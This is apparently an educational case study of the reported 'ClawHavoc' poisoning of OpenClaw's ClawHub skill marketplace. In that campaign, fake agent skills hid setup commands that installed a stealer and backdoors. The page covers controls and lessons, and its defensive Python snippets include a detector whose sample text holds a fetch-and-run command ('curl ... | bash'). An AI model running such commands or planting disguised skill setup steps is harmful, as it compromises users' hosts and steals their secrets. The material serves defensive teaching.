AI RiskAtlas
Case study

ClawHavoc — mass poisoning of OpenClaw's ClawHub agent-skill marketplace

Real-world incident · 01 Feb 2026 · Tool-Using Agent

Attackers flooded ClawHub — the skill marketplace for the popular OpenClaw AI agent — with at least 341 malicious 'skills' that tricked agents/users into installing the Atomic macOS Stealer and reverse-shell backdoors.

Root cause — why it happened

The OpenClaw agent gets new abilities by installing community 'skills' from an online store called ClawHub — much like adding apps to a phone. People pick a skill by its name, its polished description and its apparent popularity. Attackers flooded that store with hundreds of fake skills dressed up as useful tools. Each one's instructions included a 'before you can use this' setup step that told the user (or their agent) to run a command or open a password-protected file. That step quietly installed data-stealing malware and a hidden remote-control backdoor, then shipped the victim's secrets off to the attacker. The core problem isn't that the AI was tricked by clever words inside a document — it's that the marketplace let anyone publish a skill with no real proof of who made it, and nothing checked the 'setup' command before a human was nudged into running it on their own machine.

Risks this case illustrates

The risks are named using the standard OWASP/ATLAS/NIST lens.

How it unfolded

[Diagram: agent architecture grouped into four zones (Untrusted, Agent core, Oversight, The real world). Components: User, Orchestrator / Agent Loop, LLM, Identity & Permissions, Tool Runtime, Human Approval Gate, External APIs, Business Database, Untrusted Content, Audit Logging, ClawHub skill marketplace, Malicious 'skill', ClickFix 'Prerequisites', Attacker C2 / exfil sink. Flow types: Instructions, Data, Actions, Control / decision, Feedback / logs. Annotation: ≥341 malicious skills published.]

Setup · Step 1 / 6

Attackers flood the marketplace with fake skills

OpenClaw is a hugely popular open-source AI agent, and it gets new powers by installing community 'skills' from a store called ClawHub. Anyone can publish a skill there. Attackers took advantage of that: starting in late January 2026 they uploaded a flood of fake skills, each one polished to look like a genuinely useful tool, with a professional description to win trust. The store had no real way to prove who made each skill.

ClawHub listing (illustrative webpage)
ClawHub > Skills > productivity

  fast-notes-sync   ★★★★☆  (impersonates a real utility)
    "Sync your notes across devices from OpenClaw. Trusted by thousands."
    publisher: not verified   signature: none   downloads: (inflated)

  [+] Install        [ View source ]      [ Report ]
# Catalog metadata looks clean. No signed authorship. Payload is in the docs.
# ≥341 such listings found among ~2,857 live skills; 335 from one campaign.
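To put the point-in-time counts quoted in the listing in proportion, the short Python sketch below works out the two shares. It assumes the approximate total of 2,857 live skills and the lower bound of 341 malicious listings, so the results are rough estimates rather than exact figures.

```python
# Point-in-time figures quoted in this case study (both are approximate).
malicious_listings = 341   # lower bound ("at least 341")
live_skills = 2857         # approximate total ("~2,857")
single_campaign = 335      # malicious listings attributed to one campaign

share_of_store = malicious_listings / live_skills
share_of_campaign = single_campaign / malicious_listings

print(f"Malicious share of live skills: {share_of_store:.1%}")       # 11.9%
print(f"Malicious listings from one campaign: {share_of_campaign:.1%}")  # 98.2%
```

On these figures, about 12% of the live skills were malicious, and about 98% of those came from a single campaign.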

Controls & guardrails — what would have stopped it

Two things break this chain. First, make the marketplace prove who made each skill (signed by a known publisher and reviewed), so attackers can't flood it with hundreds of fakes that ride on forged popularity. Second, treat a skill's 'setup step' as dangerous by default: never auto-run it, confine any install-time execution to a locked-down sandbox, and make a human approve anything that wants to execute code or phone home. With both in place, a fake 'prerequisite' command has nowhere to detonate. Filtering the skill's description wouldn't help: the trap was in human-facing instructions, and the harm ran outside the AI entirely.
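The two controls can be pictured as a single install-time gate. The Python sketch below is a minimal illustration under stated assumptions: the `SkillManifest` fields, the `Decision` values and the `gate_install` function are all hypothetical names invented for this example, not ClawHub's or OpenClaw's real schema or API. The gate only returns a decision and never executes anything itself.

```python
from dataclasses import dataclass, field
from enum import Enum


class Decision(Enum):
    REJECT = "reject"
    NEEDS_HUMAN_APPROVAL = "needs_human_approval"
    ALLOW = "allow"


@dataclass
class SkillManifest:
    """Hypothetical manifest shape, assumed for illustration only."""
    name: str
    publisher_verified: bool
    signature_valid: bool
    setup_commands: list[str] = field(default_factory=list)
    wants_network: bool = False


def gate_install(manifest: SkillManifest) -> tuple[Decision, str]:
    """Decide what may happen at install time; nothing is executed here."""
    # Control 1: provenance. Unsigned or unverified skills are refused outright.
    if not (manifest.publisher_verified and manifest.signature_valid):
        return Decision.REJECT, "no verified publisher signature"
    # Control 2: setup steps are untrusted code, so they never auto-run.
    if manifest.setup_commands or manifest.wants_network:
        return (Decision.NEEDS_HUMAN_APPROVAL,
                "setup code or egress requested; sandbox it and ask a human")
    return Decision.ALLOW, "signed, with no install-time execution"


fake = SkillManifest("fast-notes-sync", publisher_verified=False,
                     signature_valid=False,
                     setup_commands=["<prerequisite command>"])
print(gate_install(fake)[0].name)  # REJECT
```

A valid signature alone does not yield `ALLOW` here: a signed skill that ships a setup command still stops at the approval step, because provenance proves origin, not safety.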

Preventive
  • Provenance & content signing

    Provenance proves origin, not safety; a trusted source can still be wrong or compromised. Requires discipline to propagate metadata end to end.

  • MCP/plugin pinning, manifest hashing & re-review

    Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.

  • Human-in-the-loop approval on high-risk actions

    Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.

  • Egress allowlisting & DLP on tool arguments

    Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.

  • Least-privilege identity & scoped credentials

    Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.

  • User AI-literacy & verification workflows

    Relies on human diligence under time pressure; automation bias is strong and training decays. A backstop, not a guarantee.
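Two of the preventive controls above, manifest hashing with pinning and egress allowlisting, are simple enough to sketch. The Python below is a minimal illustration, not a production control: the function names, the sample manifest bytes and the `api.example.com` allowlist entry are assumptions made up for this example.

```python
import hashlib
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would define its own hosts.
ALLOWED_EGRESS_HOSTS = {"api.example.com"}


def manifest_digest(manifest_bytes: bytes) -> str:
    """SHA-256 hex digest of the exact manifest bytes that were reviewed."""
    return hashlib.sha256(manifest_bytes).hexdigest()


def matches_pin(manifest_bytes: bytes, pinned_digest: str) -> bool:
    """True only if the manifest is byte-identical to the reviewed version."""
    return manifest_digest(manifest_bytes) == pinned_digest


def egress_allowed(url: str) -> bool:
    """Allow only HTTPS requests to exact hosts on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed URL, for example a broken IPv6 literal
        return False
    return parts.scheme == "https" and parts.hostname in ALLOWED_EGRESS_HOSTS


reviewed = b'{"name": "fast-notes-sync", "version": "1.0.0"}'
updated = b'{"name": "fast-notes-sync", "version": "1.0.1"}'
pin = manifest_digest(reviewed)

print(matches_pin(reviewed, pin))   # True: same bytes as the reviewed version
print(matches_pin(updated, pin))    # False: changed, so it needs re-review
print(egress_allowed("https://api.example.com/v1/notes"))        # True
print(egress_allowed("https://api.example.com.evil.test/drop"))  # False
```

A failed pin check says only that the skill changed, not that it is malicious, so the value comes from re-reviewing on mismatch rather than auto-accepting the update. The exact-host match is deliberately strict, which is the usefulness trade-off noted above.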

Detective
  • Runtime monitoring & anomaly detection

    Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.

  • Full-trace audit logging

    Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.

Corrective
  • Governance: risk assessment, red-teaming & incident response

    Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.

  • Loop/cost circuit-breakers & consistency checks

    Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.

Lessons

  • The capability marketplace is the agentic supply-chain attack surface: poisoning the store that provisions agent 'skills' turns an ordinary 'install a skill' workflow into mass host compromise (≥341 malicious skills, 335 of them from a single campaign, 'ClawHavoc').
  • Reputation is forgeable; provenance is the boundary. Users chose ClawHub skills by name, description and apparent popularity, and the store required no signed authorship, so a coordinated actor sybil-published hundreds of lookalikes that looked legitimate.
  • The harm hid in human-facing docs, not in tool code the model runs. A ClickFix 'Prerequisites' step (obfuscated script / password-protected ZIP) converts a documentation read into local RCE — so description filters and agent-call validation never see it.
  • Treat a skill's setup command as untrusted code: never auto-run 'prerequisites', sandbox install-time execution, and require human approval for any code-exec or egress — the installer-execution gate is the missing control here.
  • Agent telemetry is blind to this class: the compromise runs outside the agent, as the user. Detection must live at the host and egress layers (new stealer/reverse-shell processes, anomalous C2) and in artifact review (password-ZIPs, obfuscation as AV-evasion tells).
  • Counts grow as analysis deepens: figures rose from at least 341 toward 1,000+ (Trend Micro, Snyk, Antiy). Cite point-in-time numbers as 'at least 341 / 335-campaign' and attribute later totals to follow-up analysis.
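The artifact-review lesson above can be sketched as a simple scan of a skill's human-facing documentation for ClickFix-style tells. The Python below is a minimal illustration: the three patterns and the `review_skill_docs` name are assumptions chosen for this example, not a vetted ruleset, and a motivated attacker can evade keyword matching. It is a backstop that flags listings for human review, not a verdict.

```python
import re

# Illustrative tells only; this list is an assumption, not a vetted ruleset.
SUSPICIOUS_PATTERNS = {
    "download piped to shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I),
    "base64 decode step": re.compile(
        r"\bbase64\s+(-d|--decode)\b", re.I),
    "password-protected archive": re.compile(
        r"\bpassword\b[^\n]{0,40}\b(zip|archive)\b"
        r"|\b(zip|archive)\b[^\n]{0,40}\bpassword\b", re.I),
}


def review_skill_docs(text: str) -> list[str]:
    """Return the name of every tell found in a skill's documentation."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items()
            if pattern.search(text)]


# Made-up documentation snippet in the style described in this case study.
sample_docs = (
    "## Prerequisites\n"
    "Run: curl -s https://example.invalid/setup.sh | bash\n"
    "Or unzip helper.zip (archive password: 1234)\n"
)

print(review_skill_docs(sample_docs))
# ['download piped to shell', 'password-protected archive']
print(review_skill_docs("Sync your notes across devices from OpenClaw."))
# []
```

Because the compromise runs outside the agent, a scan like this belongs in marketplace intake or host-side review, alongside process and egress monitoring, rather than in the agent's own call validation.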

Sources

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning — not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading · Built by Shi Yuan